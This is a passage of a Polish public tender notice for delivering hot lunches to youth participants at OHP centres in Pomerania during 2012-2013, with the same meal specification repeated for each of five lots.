<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-6 ŚHP w Gdańsku ul. Brzegi 45	
20 osób x 52 dni = 1040 posiłków	2012
20 osób x 52 dni = 1040 posiłków	2013
razem 2080
1.	Wyżywienie w ilości jednego posiłku dziennie na uczestnika będzie dostarczane uczestnikom w  trakcie zajęć dydaktycznych na adresy wskazane w w/w tabeli w okresie od dnia zawarcia umowy do 10-12-2013 r.. 
2.	Przez wyżywienie rozumie się ciepły posiłek składający się z:
	- drugiego dania obiadowego (dopuszcza się raz w miesiącu posiłki typu pizza, chińszczyzna lub  inne nietradycyjne danie obiadowe),
	- napoju (ciepłe lub zimne w zależności od pory roku).
3.	Przedmiot zamówienia będzie realizowany dla osób w wieku 15-24 lata.
4.	Posiłki muszą być dostarczone w naczyniach jednorazowych razem z workami na odpady.
5.	Wykonawca jest zobowiązany do przygotowania jednego posiłku dziennie dla każdego z uczestników, przy czym będzie to posiłek ciepły składający się z dania głównego i napoju.
6.	Posiłek zostanie dostarczony przez Wykonawcę w miejsce wskazane przez pracownika Zamawiającego, pełniącego funkcję koordynatora terenowego przy czym w szczególnych przypadkach mogą to  być soboty i niedziele oraz dni wolne od pracy. 
7.	Dokładna ilość zamawianych posiłków określana będzie przez koordynatora terenowego w momencie rozpoczęcia zajęć w danym dniu i uzależniona jest od liczby osób obecnych na zajęciach danego dnia. 
8.	Wykonawca zobowiązany jest do zapewnienia zróżnicowanego menu. Z początkiem miesiąca Wykonawca przekłada do akceptacji koordynatorowi terenowemu jadłospis na dany miesiąc.  
9.	W uzasadnionych przypadkach Wykonawca obowiązany jest zapewnić odrębne menu dla   indywidualnych uczestników (np.: ze względów zdrowotnych, światopoglądowych uczestników)
10.	Wykonawca jest zobowiązany do przygotowania posiłków ze świeżych produktów przy zachowaniu wszelkich norm i wymogów sanitarnych. Wartość kaloryczna powinna być zgodna z obowiązującymi normami żywienia. 
11.	W razie stwierdzenia przez pracownika Zamawiającego niezgodności przygotowania lub dostarczenia posiłku, poczęstunku z normami i wymogami sanitarnymi, Wykonawca zobowiązany jest do niezwłocznego dostarczenia innego posiłku, poczęstunku.  
12.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków uzależnioną od obecności uczestników na zajęciach.
13.	Dostawa posiłków, poczęstunku do wskazanych miejsc  odbywać się będzie na koszt Wykonawcy.  
14.	Dokładne określenie ilości posiłków i ilości uczestników w każdym dniu będzie możliwe dopiero na etapie praktycznej realizacji projektu. Możliwa jest również sytuacja, kiedy w danym dniu nie będą dostarczane posiłki.
15.	Wykonawca ma obowiązek stosować zróżnicowane menu składające się z posiłków dostarczających podstawowe wartości odżywcze.
16.	Wykonawca przed podpisaniem umowy z Zamawiającym zobowiązany jest dołączyć przykładowy jadłospis na 1 tydzień. 
17.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4. 
18.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości zamawianych posiłków w stosunku do podanych w formularzu cenowym i SIWZ. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
19.	Posiłek powinien składać się z co najmniej z:
A.	ziemniaki lub ryż lub kasza lub makaron lub kopytka lub kluski śląskie - 180 gram-  
- sztuka mięsa bez sosu 150 gram lub sztuka mięsa z sosem 160 gram lub kotlet schabowy sosie 130 gam lub kotlet schabowy panierowany 150 gram lub kotlet z piersi kurczaka w panierce 150 gram lub ryba bez panierki 150 gram lub ryba panierowana 170 gram lub udko z kurczaka 150 gram lub kotlet mielony 150 gram lub pulpety 150 gram lub gołąbki 150 gram
B.	 surówka warzywna sezonowa 120 gram,
C.	 napój 200 ml
W przypadku bardziej zróżnicowanego menu gramatura posiłku nie może być mniejsza. 
20.	Do zadań Wykonawcy należy również obsługa i zapewnienie odbioru odpadów pokonsumpcyjnych (pojemników termoizolacyjnych, sztućców) po posiłku. Zamawiający zastrzega sobie możliwość zmiany ilości dostarczonych posiłków (zmniejszenia) w zależności od faktycznie istniejących potrzeb - poprzez telefoniczną informację najpóźniej do godz. 10:00 w dniu planowanego dnia posiłku. Uczestnicy kwitują odbiór posiłku własnoręcznym podpisem. Rozliczenie nastąpi za rzeczywistą ilość dostarczonych posiłków. Ceny zaoferowane przez wykonawcę nie ulegną zmianie przez okres obowiązywania umowy.  
21.	Posiłek powinien być w formie ciepłego dania obiadowego wraz z napojem. Obiad dla każdego uczestnika ma być podany na ciepło w pojemniku termoizolacyjnym (posiadającym  stosowny atest), z kompletem sztućców i serwetek. Należy zadbać o zróżnicowane menu składające się z posiłków dostarczających podstawowych wartości odżywczych. Wykonawca odpowiada za przygotowanie i transport przedmiotu zamówienia zgodnie z obowiązującymi wymaganiami sanitarnymi dotyczącymi żywności i żywienia zbiorowego, dostarcza posiłki do miejsca spożycia zapewniając utrzymanie właściwej jakości i temperatury. Przygotowanie posiłków odbywać się musi wyłącznie na bazie pełnowartościowych produktów wysokiej jakości oraz produktów posiadających stosowne atesty.
22.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków, uzależnioną od obecności uczestników na zajęciach.
23.	Wykonawca będzie dostarczał do siedziby PWK OHP fakturę/rachunek za dany miesiąc do 5 każdego następnego miesiąca. 
24.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych  (osobno na MAU 2 i NP), które wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2	2012 r.	2013 r.	RAZEM ILOŚĆ POSIŁKÓW
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-12 HP w Gdyni, ul. Śląska 53	
20 osób x 52 dni = 1040 posiłków 2012	
20 osób x 52 dni = 1040 posiłków	2013
Razem 2080
1.	Wyżywienie w ilości jednego posiłku dziennie na uczestnika będzie dostarczane uczestnikom w  trakcie zajęć dydaktycznych na adresy wskazane w w/w tabeli w okresie od dnia zawarcia umowy do 10-12-2013 r.. 
2.	Przez wyżywienie rozumie się ciepły posiłek składający się z:
	- drugiego dania obiadowego (dopuszcza się raz w miesiącu posiłki typu pizza, chińszczyzna lub  inne nietradycyjne danie obiadowe),
	- napoju (ciepłe lub zimne w zależności od pory roku).
3.	Przedmiot zamówienia będzie realizowany dla osób w wieku 15-24 lata.
4.	Posiłki muszą być dostarczone w naczyniach jednorazowych razem z workami na odpady.
5.	Wykonawca jest zobowiązany do przygotowania jednego posiłku dziennie dla każdego z uczestników, przy czym będzie to posiłek ciepły składający się z dania głównego i napoju.
6.	Posiłek zostanie dostarczony przez Wykonawcę w miejsce wskazane przez pracownika Zamawiającego, pełniącego funkcję koordynatora terenowego przy czym w szczególnych przypadkach mogą to  być soboty i niedziele oraz dni wolne od pracy. 
7.	Dokładna ilość zamawianych posiłków określana będzie przez koordynatora terenowego w momencie rozpoczęcia zajęć w danym dniu i uzależniona jest od liczby osób obecnych na zajęciach danego dnia. 
8.	Wykonawca zobowiązany jest do zapewnienia zróżnicowanego menu. Z początkiem miesiąca Wykonawca przekłada do akceptacji koordynatorowi terenowemu jadłospis na dany miesiąc.  
9.	W uzasadnionych przypadkach Wykonawca obowiązany jest zapewnić odrębne menu dla   indywidualnych uczestników (np.: ze względów zdrowotnych, światopoglądowych uczestników)
10.	Wykonawca jest zobowiązany do przygotowania posiłków ze świeżych produktów przy zachowaniu wszelkich norm i wymogów sanitarnych. Wartość kaloryczna powinna być zgodna z obowiązującymi normami żywienia. 
11.	W razie stwierdzenia przez pracownika Zamawiającego niezgodności przygotowania lub dostarczenia posiłku, poczęstunku z normami i wymogami sanitarnymi, Wykonawca zobowiązany jest do niezwłocznego dostarczenia innego posiłku, poczęstunku.  
12.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków uzależnioną od obecności uczestników na zajęciach.
13.	Dostawa posiłków, poczęstunku do wskazanych miejsc  odbywać się będzie na koszt Wykonawcy.  
14.	Dokładne określenie ilości posiłków i ilości uczestników w każdym dniu będzie możliwe dopiero na etapie praktycznej realizacji projektu. Możliwa jest również sytuacja, kiedy w danym dniu nie będą dostarczane posiłki.
15.	Wykonawca ma obowiązek stosować zróżnicowane menu składające się z posiłków dostarczających podstawowe wartości odżywcze.
16.	Wykonawca przed podpisaniem umowy z Zamawiającym zobowiązany jest dołączyć przykładowy jadłospis na 1 tydzień. 
17.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4. 
18.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości zamawianych posiłków w stosunku do podanych w formularzu cenowym i SIWZ. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
19.	Posiłek powinien składać się z co najmniej z:
A.	ziemniaki lub ryż lub kasza lub makaron lub kopytka lub kluski śląskie - 180 gram-  
- sztuka mięsa bez sosu 150 gram lub sztuka mięsa z sosem 160 gram lub kotlet schabowy sosie 130 gam lub kotlet schabowy panierowany 150 gram lub kotlet z piersi kurczaka w panierce 150 gram lub ryba bez panierki 150 gram lub ryba panierowana 170 gram lub udko z kurczaka 150 gram lub kotlet mielony 150 gram lub pulpety 150 gram lub gołąbki 150 gram
B.	 surówka warzywna sezonowa 120 gram,
C.	 napój 200 ml
W przypadku bardziej zróżnicowanego menu gramatura posiłku nie może być mniejsza. 
20.	Do zadań Wykonawcy należy również obsługa i zapewnienie odbioru odpadów pokonsumpcyjnych (pojemników termoizolacyjnych, sztućców) po posiłku. Zamawiający zastrzega sobie możliwość zmiany ilości dostarczonych posiłków (zmniejszenia) w zależności od faktycznie istniejących potrzeb - poprzez telefoniczną informację najpóźniej do godz. 10:00 w dniu planowanego dnia posiłku. Uczestnicy kwitują odbiór posiłku własnoręcznym podpisem. Rozliczenie nastąpi za rzeczywistą ilość dostarczonych posiłków. Ceny zaoferowane przez wykonawcę nie ulegną zmianie przez okres obowiązywania umowy.  
21.	Posiłek powinien być w formie ciepłego dania obiadowego wraz z napojem. Obiad dla każdego uczestnika ma być podany na ciepło w pojemniku termoizolacyjnym (posiadającym  stosowny atest), z kompletem sztućców i serwetek. Należy zadbać o zróżnicowane menu składające się z posiłków dostarczających podstawowych wartości odżywczych. Wykonawca odpowiada za przygotowanie i transport przedmiotu zamówienia zgodnie z obowiązującymi wymaganiami sanitarnymi dotyczącymi żywności i żywienia zbiorowego, dostarcza posiłki do miejsca spożycia zapewniając utrzymanie właściwej jakości i temperatury. Przygotowanie posiłków odbywać się musi wyłącznie na bazie pełnowartościowych produktów wysokiej jakości oraz produktów posiadających stosowne atesty.
22.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków, uzależnioną od obecności uczestników na zajęciach.
23.	Wykonawca będzie dostarczał do siedziby PWK OHP fakturę/rachunek za dany miesiąc do 5 każdego następnego miesiąca. 
24.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych  (osobno na MAU 2 i NP), które wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3	2012 r.	2013 r.
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11- 23 ŚHP w Słupsku ul. Dunikowskiego 3	
40 osób x 52 dni = 2080 posiłków	2012
40 osób x 52 dni = 2080 posiłków 2013
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia:  
 CEiPM  w Słupsku ul. Dunikowskiego 3	
40 osób x 52 dni = 2080 posiłków	2012
40 osób x 52 dni = 2080 posiłków  2013
Razem 8320
1.	Wyżywienie w ilości jednego posiłku dziennie na uczestnika będzie dostarczane uczestnikom w  trakcie zajęć dydaktycznych na adresy wskazane w w/w tabeli w okresie od dnia zawarcia umowy do 10-12-2013 r.. 
2.	Przez wyżywienie rozumie się ciepły posiłek składający się z:
	- drugiego dania obiadowego (dopuszcza się raz w miesiącu posiłki typu pizza, chińszczyzna lub  inne nietradycyjne danie obiadowe),
	- napoju (ciepłe lub zimne w zależności od pory roku).
3.	Przedmiot zamówienia będzie realizowany dla osób w wieku 15-24 lata.
4.	Posiłki muszą być dostarczone w naczyniach jednorazowych razem z workami na odpady.
5.	Wykonawca jest zobowiązany do przygotowania jednego posiłku dziennie dla każdego z uczestników, przy czym będzie to posiłek ciepły składający się z dania głównego i napoju.
6.	Posiłek zostanie dostarczony przez Wykonawcę w miejsce wskazane przez pracownika Zamawiającego, pełniącego funkcję koordynatora terenowego przy czym w szczególnych przypadkach mogą to  być soboty i niedziele oraz dni wolne od pracy. 
7.	Dokładna ilość zamawianych posiłków określana będzie przez koordynatora terenowego w momencie rozpoczęcia zajęć w danym dniu i uzależniona jest od liczby osób obecnych na zajęciach danego dnia. 
8.	Wykonawca zobowiązany jest do zapewnienia zróżnicowanego menu. Z początkiem miesiąca Wykonawca przekłada do akceptacji koordynatorowi terenowemu jadłospis na dany miesiąc.  
9.	W uzasadnionych przypadkach Wykonawca obowiązany jest zapewnić odrębne menu dla   indywidualnych uczestników (np.: ze względów zdrowotnych, światopoglądowych uczestników)
10.	Wykonawca jest zobowiązany do przygotowania posiłków ze świeżych produktów przy zachowaniu wszelkich norm i wymogów sanitarnych. Wartość kaloryczna powinna być zgodna z obowiązującymi normami żywienia. 
11.	W razie stwierdzenia przez pracownika Zamawiającego niezgodności przygotowania lub dostarczenia posiłku, poczęstunku z normami i wymogami sanitarnymi, Wykonawca zobowiązany jest do niezwłocznego dostarczenia innego posiłku, poczęstunku.  
12.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków uzależnioną od obecności uczestników na zajęciach.
13.	Dostawa posiłków, poczęstunku do wskazanych miejsc  odbywać się będzie na koszt Wykonawcy.  
14.	Dokładne określenie ilości posiłków i ilości uczestników w każdym dniu będzie możliwe dopiero na etapie praktycznej realizacji projektu. Możliwa jest również sytuacja, kiedy w danym dniu nie będą dostarczane posiłki.
15.	Wykonawca ma obowiązek stosować zróżnicowane menu składające się z posiłków dostarczających podstawowe wartości odżywcze.
16.	Wykonawca przed podpisaniem umowy z Zamawiającym zobowiązany jest dołączyć przykładowy jadłospis na 1 tydzień. 
17.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4. 
18.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości zamawianych posiłków w stosunku do podanych w formularzu cenowym i SIWZ. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
19.	Posiłek powinien składać się z co najmniej z:
A.	ziemniaki lub ryż lub kasza lub makaron lub kopytka lub kluski śląskie - 180 gram-  
- sztuka mięsa bez sosu 150 gram lub sztuka mięsa z sosem 160 gram lub kotlet schabowy sosie 130 gam lub kotlet schabowy panierowany 150 gram lub kotlet z piersi kurczaka w panierce 150 gram lub ryba bez panierki 150 gram lub ryba panierowana 170 gram lub udko z kurczaka 150 gram lub kotlet mielony 150 gram lub pulpety 150 gram lub gołąbki 150 gram
B.	 surówka warzywna sezonowa 120 gram,
C.	 napój 200 ml
W przypadku bardziej zróżnicowanego menu gramatura posiłku nie może być mniejsza. 
20.	Do zadań Wykonawcy należy również obsługa i zapewnienie odbioru odpadów pokonsumpcyjnych (pojemników termoizolacyjnych, sztućców) po posiłku. Zamawiający zastrzega sobie możliwość zmiany ilości dostarczonych posiłków (zmniejszenia) w zależności od faktycznie istniejących potrzeb - poprzez telefoniczną informację najpóźniej do godz. 10:00 w dniu planowanego dnia posiłku. Uczestnicy kwitują odbiór posiłku własnoręcznym podpisem. Rozliczenie nastąpi za rzeczywistą ilość dostarczonych posiłków. Ceny zaoferowane przez wykonawcę nie ulegną zmianie przez okres obowiązywania umowy.  
21.	Posiłek powinien być w formie ciepłego dania obiadowego wraz z napojem. Obiad dla każdego uczestnika ma być podany na ciepło w pojemniku termoizolacyjnym (posiadającym  stosowny atest), z kompletem sztućców i serwetek. Należy zadbać o zróżnicowane menu składające się z posiłków dostarczających podstawowych wartości odżywczych. Wykonawca odpowiada za przygotowanie i transport przedmiotu zamówienia zgodnie z obowiązującymi wymaganiami sanitarnymi dotyczącymi żywności i żywienia zbiorowego, dostarcza posiłki do miejsca spożycia zapewniając utrzymanie właściwej jakości i temperatury. Przygotowanie posiłków odbywać się musi wyłącznie na bazie pełnowartościowych produktów wysokiej jakości oraz produktów posiadających stosowne atesty.
22.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków, uzależnioną od obecności uczestników na zajęciach.
23.	Wykonawca będzie dostarczał do siedziby PWK OHP fakturę/rachunek za dany miesiąc do 5 każdego następnego miesiąca. 
24.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych  (osobno na MAU 2 i NP), które wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4	2012 r.	2013 r.	
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-5 ŚHP w Lęborku, ul. B. Krzywoustego 1	
15 osób x 12 dni = 180 posiłków	2012
15 osób x 10 dni = 150 posiłków	2013
Razem 330

1.	Wyżywienie w ilości jednego posiłku dziennie na uczestnika będzie dostarczane uczestnikom w  trakcie zajęć dydaktycznych na adresy wskazane w w/w tabeli w okresie od dnia zawarcia umowy do 10-12-2013 r.. 
2.	Przez wyżywienie rozumie się ciepły posiłek składający się z:
	- drugiego dania obiadowego (dopuszcza się raz w miesiącu posiłki typu pizza, chińszczyzna lub  inne nietradycyjne danie obiadowe),
	- napoju (ciepłe lub zimne w zależności od pory roku).
3.	Przedmiot zamówienia będzie realizowany dla osób w wieku 15-24 lata.
4.	Posiłki muszą być dostarczone w naczyniach jednorazowych razem z workami na odpady.
5.	Wykonawca jest zobowiązany do przygotowania jednego posiłku dziennie dla każdego z uczestników, przy czym będzie to posiłek ciepły składający się z dania głównego i napoju.
6.	Posiłek zostanie dostarczony przez Wykonawcę w miejsce wskazane przez pracownika Zamawiającego, pełniącego funkcję koordynatora terenowego przy czym w szczególnych przypadkach mogą to  być soboty i niedziele oraz dni wolne od pracy. 
7.	Dokładna ilość zamawianych posiłków określana będzie przez koordynatora terenowego w momencie rozpoczęcia zajęć w danym dniu i uzależniona jest od liczby osób obecnych na zajęciach danego dnia. 
8.	Wykonawca zobowiązany jest do zapewnienia zróżnicowanego menu. Z początkiem miesiąca Wykonawca przekłada do akceptacji koordynatorowi terenowemu jadłospis na dany miesiąc.  
9.	W uzasadnionych przypadkach Wykonawca obowiązany jest zapewnić odrębne menu dla   indywidualnych uczestników (np.: ze względów zdrowotnych, światopoglądowych uczestników)
10.	Wykonawca jest zobowiązany do przygotowania posiłków ze świeżych produktów przy zachowaniu wszelkich norm i wymogów sanitarnych. Wartość kaloryczna powinna być zgodna z obowiązującymi normami żywienia. 
11.	W razie stwierdzenia przez pracownika Zamawiającego niezgodności przygotowania lub dostarczenia posiłku, poczęstunku z normami i wymogami sanitarnymi, Wykonawca zobowiązany jest do niezwłocznego dostarczenia innego posiłku, poczęstunku.  
12.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków uzależnioną od obecności uczestników na zajęciach.
13.	Dostawa posiłków, poczęstunku do wskazanych miejsc  odbywać się będzie na koszt Wykonawcy.  
14.	Dokładne określenie ilości posiłków i ilości uczestników w każdym dniu będzie możliwe dopiero na etapie praktycznej realizacji projektu. Możliwa jest również sytuacja, kiedy w danym dniu nie będą dostarczane posiłki.
15.	Wykonawca ma obowiązek stosować zróżnicowane menu składające się z posiłków dostarczających podstawowe wartości odżywcze.
16.	Wykonawca przed podpisaniem umowy z Zamawiającym zobowiązany jest dołączyć przykładowy jadłospis na 1 tydzień. 
17.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4. 
18.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości zamawianych posiłków w stosunku do podanych w formularzu cenowym i SIWZ. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
19.	Posiłek powinien składać się z co najmniej z:
A.	ziemniaki lub ryż lub kasza lub makaron lub kopytka lub kluski śląskie - 180 gram-  
- sztuka mięsa bez sosu 150 gram lub sztuka mięsa z sosem 160 gram lub kotlet schabowy sosie 130 gam lub kotlet schabowy panierowany 150 gram lub kotlet z piersi kurczaka w panierce 150 gram lub ryba bez panierki 150 gram lub ryba panierowana 170 gram lub udko z kurczaka 150 gram lub kotlet mielony 150 gram lub pulpety 150 gram lub gołąbki 150 gram
B.	 surówka warzywna sezonowa 120 gram,
C.	 napój 200 ml
W przypadku bardziej zróżnicowanego menu gramatura posiłku nie może być mniejsza. 
20.	Do zadań Wykonawcy należy również obsługa i zapewnienie odbioru odpadów pokonsumpcyjnych (pojemników termoizolacyjnych, sztućców) po posiłku. Zamawiający zastrzega sobie możliwość zmiany ilości dostarczonych posiłków (zmniejszenia) w zależności od faktycznie istniejących potrzeb - poprzez telefoniczną informację najpóźniej do godz. 10:00 w dniu planowanego dnia posiłku. Uczestnicy kwitują odbiór posiłku własnoręcznym podpisem. Rozliczenie nastąpi za rzeczywistą ilość dostarczonych posiłków. Ceny zaoferowane przez wykonawcę nie ulegną zmianie przez okres obowiązywania umowy.  
21.	Posiłek powinien być w formie ciepłego dania obiadowego wraz z napojem. Obiad dla każdego uczestnika ma być podany na ciepło w pojemniku termoizolacyjnym (posiadającym  stosowny atest), z kompletem sztućców i serwetek. Należy zadbać o zróżnicowane menu składające się z posiłków dostarczających podstawowych wartości odżywczych. Wykonawca odpowiada za przygotowanie i transport przedmiotu zamówienia zgodnie z obowiązującymi wymaganiami sanitarnymi dotyczącymi żywności i żywienia zbiorowego, dostarcza posiłki do miejsca spożycia zapewniając utrzymanie właściwej jakości i temperatury. Przygotowanie posiłków odbywać się musi wyłącznie na bazie pełnowartościowych produktów wysokiej jakości oraz produktów posiadających stosowne atesty.
22.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków, uzależnioną od obecności uczestników na zajęciach.
23.	Wykonawca będzie dostarczał do siedziby PWK OHP fakturę/rachunek za dany miesiąc do 5 każdego następnego miesiąca. 
24.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych  (osobno na MAU 2 i NP), które wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5	
Miejsce realizacji zajęć projektowych oraz miejsce dostarczania usługi wyżywienia: 
11-19 HP w Słupsku, ul. Przemysłowa 100 	
15 osób x 12 dni = 180 posiłków	2012
15 osób x 10 dni = 150 posiłków	2013
Razem 330
1.	Wyżywienie w ilości jednego posiłku dziennie na uczestnika będzie dostarczane uczestnikom w  trakcie zajęć dydaktycznych na adresy wskazane w w/w tabeli w okresie od dnia zawarcia umowy do 10-12-2013 r.. 
2.	Przez wyżywienie rozumie się ciepły posiłek składający się z:
	- drugiego dania obiadowego (dopuszcza się raz w miesiącu posiłki typu pizza, chińszczyzna lub  inne nietradycyjne danie obiadowe),
	- napoju (ciepłe lub zimne w zależności od pory roku).
3.	Przedmiot zamówienia będzie realizowany dla osób w wieku 15-24 lata.
4.	Posiłki muszą być dostarczone w naczyniach jednorazowych razem z workami na odpady.
5.	Wykonawca jest zobowiązany do przygotowania jednego posiłku dziennie dla każdego z uczestników, przy czym będzie to posiłek ciepły składający się z dania głównego i napoju.
6.	Posiłek zostanie dostarczony przez Wykonawcę w miejsce wskazane przez pracownika Zamawiającego, pełniącego funkcję koordynatora terenowego przy czym w szczególnych przypadkach mogą to  być soboty i niedziele oraz dni wolne od pracy. 
7.	Dokładna ilość zamawianych posiłków określana będzie przez koordynatora terenowego w momencie rozpoczęcia zajęć w danym dniu i uzależniona jest od liczby osób obecnych na zajęciach danego dnia. 
8.	Wykonawca zobowiązany jest do zapewnienia zróżnicowanego menu. Z początkiem miesiąca Wykonawca przekłada do akceptacji koordynatorowi terenowemu jadłospis na dany miesiąc.  
9.	W uzasadnionych przypadkach Wykonawca obowiązany jest zapewnić odrębne menu dla   indywidualnych uczestników (np.: ze względów zdrowotnych, światopoglądowych uczestników)
10.	Wykonawca jest zobowiązany do przygotowania posiłków ze świeżych produktów przy zachowaniu wszelkich norm i wymogów sanitarnych. Wartość kaloryczna powinna być zgodna z obowiązującymi normami żywienia. 
11.	W razie stwierdzenia przez pracownika Zamawiającego niezgodności przygotowania lub dostarczenia posiłku, poczęstunku z normami i wymogami sanitarnymi, Wykonawca zobowiązany jest do niezwłocznego dostarczenia innego posiłku, poczęstunku.  
12.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków uzależnioną od obecności uczestników na zajęciach.
13.	Dostawa posiłków, poczęstunku do wskazanych miejsc  odbywać się będzie na koszt Wykonawcy.  
14.	Dokładne określenie ilości posiłków i ilości uczestników w każdym dniu będzie możliwe dopiero na etapie praktycznej realizacji projektu. Możliwa jest również sytuacja, kiedy w danym dniu nie będą dostarczane posiłki.
15.	Wykonawca ma obowiązek stosować zróżnicowane menu składające się z posiłków dostarczających podstawowe wartości odżywcze.
16.	Wykonawca przed podpisaniem umowy z Zamawiającym zobowiązany jest dołączyć przykładowy jadłospis na 1 tydzień. 
17.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4. 
18.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości zamawianych posiłków w stosunku do podanych w formularzu cenowym i SIWZ. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
19.	Posiłek powinien składać się z co najmniej z:
A.	ziemniaki lub ryż lub kasza lub makaron lub kopytka lub kluski śląskie - 180 gram-  
- sztuka mięsa bez sosu 150 gram lub sztuka mięsa z sosem 160 gram lub kotlet schabowy sosie 130 gam lub kotlet schabowy panierowany 150 gram lub kotlet z piersi kurczaka w panierce 150 gram lub ryba bez panierki 150 gram lub ryba panierowana 170 gram lub udko z kurczaka 150 gram lub kotlet mielony 150 gram lub pulpety 150 gram lub gołąbki 150 gram
B.	 surówka warzywna sezonowa 120 gram,
C.	 napój 200 ml
W przypadku bardziej zróżnicowanego menu gramatura posiłku nie może być mniejsza. 
